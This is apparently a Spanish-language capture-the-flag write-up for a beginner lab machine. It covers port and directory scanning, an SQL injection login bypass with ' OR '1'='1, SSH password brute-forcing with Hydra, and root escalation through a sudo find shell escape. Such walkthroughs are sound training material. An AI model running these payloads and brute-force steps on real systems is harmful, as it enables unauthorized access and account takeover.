> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/the-hacker-labs/bocata-de-calamares.md).

# Bocata de Calamares

🔍 Dificultad: Principiante

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.59
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FYQZhZqyXHQRcFRwvY11h%2Fimage.png?alt=media&amp;token=cf7352fb-c1e2-4913-8a03-98165db3b209" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open 192.168.1.59 --min-rate 5000 -n
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPW8GN31oAgPYBommfsQE%2Fimage.png?alt=media&amp;token=c37e1404-3bf0-418d-a191-39155cea89f1" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH y** el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 192.168.1.59
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FwrpCX0RSIUEcll70B9fY%2Fimage.png?alt=media&amp;token=f3b6dbc3-b248-4360-aa65-5a4f504c46ee" alt=""><figcaption></figcaption></figure>

Miramos a ver que contiene el puerto 80 por si encontramos alguna información relevante.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FoMjst1JTD0WlvX10dOsB%2Fimage.png?alt=media&amp;token=d643213c-2edc-480d-adad-a1f260e97dab" alt=""><figcaption></figcaption></figure>

Vemos que nos advierten sobre inyecciones SQL.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fw67CWxzreNgZ2x0dJD9H%2Fimage.png?alt=media&amp;token=9ce2854f-b533-42ed-8fc6-2eb123b91cec" alt=""><figcaption></figcaption></figure>

Como no encontramos nada más relevante hacemos un escaneo de directorios.

```bash
gobuster dir -u http://192.168.1.59/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FgN16yF6HHD8YVx33JnJK%2Fimage.png?alt=media&amp;token=0ce4ffd4-c023-4603-a01c-142ea04c766e" alt=""><figcaption></figcaption></figure>

Nos llama la atención el archvio **login.php** por lo que miramos que contiene.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FSdKmrRMhZJw9VlmPnJD6%2Fimage.png?alt=media&amp;token=54ad9708-e969-4df8-9531-c9b81a93e5b7" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Es un panel de login con el que probamos una **SQL Injectio**n.

```bash
admin
' OR '1'='1
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FeXAMovibLb90gaCs6uaH%2Fimage.png?alt=media&amp;token=0baa5f8c-21fd-42d8-af85-34260c6a34fc" alt=""><figcaption></figcaption></figure>

Accedemos al enlace.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJiTSxnDSkK5M0rDp7o0k%2Fimage.png?alt=media&amp;token=97781343-e7fd-4064-a48a-e9ef92324086" alt=""><figcaption></figcaption></figure>

En el tercer parámetro nos da una pista en la que tenemos que codificar en **base64** la cadena **lee\_archivos**.

```bash
echo "lee_archivos" | base64
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBhNiTK3qFkmY6iMDDM8U%2Fimage.png?alt=media&amp;token=5e5b69cb-e3cb-4ef5-822e-85782691e902" alt=""><figcaption></figcaption></figure>

Metiendo esa cadena en el diccionario descubrimos que existe esa página.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FoaUEoihxTWC0jzkhNqjM%2Fimage.png?alt=media&amp;token=869677f5-93a9-487d-85b2-fb7213fa9298" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FUI98NQ7lXPbTiTs3pjMQ%2Fimage.png?alt=media&amp;token=01c5e40c-f928-4ec0-8d51-9b14fccdb5e4" alt=""><figcaption></figcaption></figure>

Hemos localizado al usuario **superadministrator**; procederemos a intentar encontrar su contraseña utilizando **Hydra**.

```bash
hydra -l superadministrator -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.59
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FCcoKMQXbO1fdyQoOcT4I%2Fimage.png?alt=media&amp;token=9bf59cad-b027-47a8-835b-d8be2aa1a58a" alt=""><figcaption></figcaption></figure>

Iniciamos sesión con las credenciales obtenidas.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fgng60t7IgtXdPFjlSub2%2Fimage.png?alt=media&amp;token=28e925ad-f22e-4693-8dab-bdcdcf0a09f2" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.&#x20;

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FWhEAxc41vel0BhoC3ODq%2Fimage.png?alt=media&amp;token=bd00dc80-f896-45b3-b00f-b654adac1715" alt=""><figcaption></figcaption></figure>

{% embed url="<https://gtfobins.github.io/gtfobins/find/>" %}

```bash
sudo find . -exec /bin/sh \; -quit
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqO2AyMgGqljRhY2L1bz0%2Fimage.png?alt=media&amp;token=36c8f12e-ec1f-4e6e-99e1-210f993e8e59" alt=""><figcaption></figcaption></figure>

Ya somos **root**.&#x20;

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
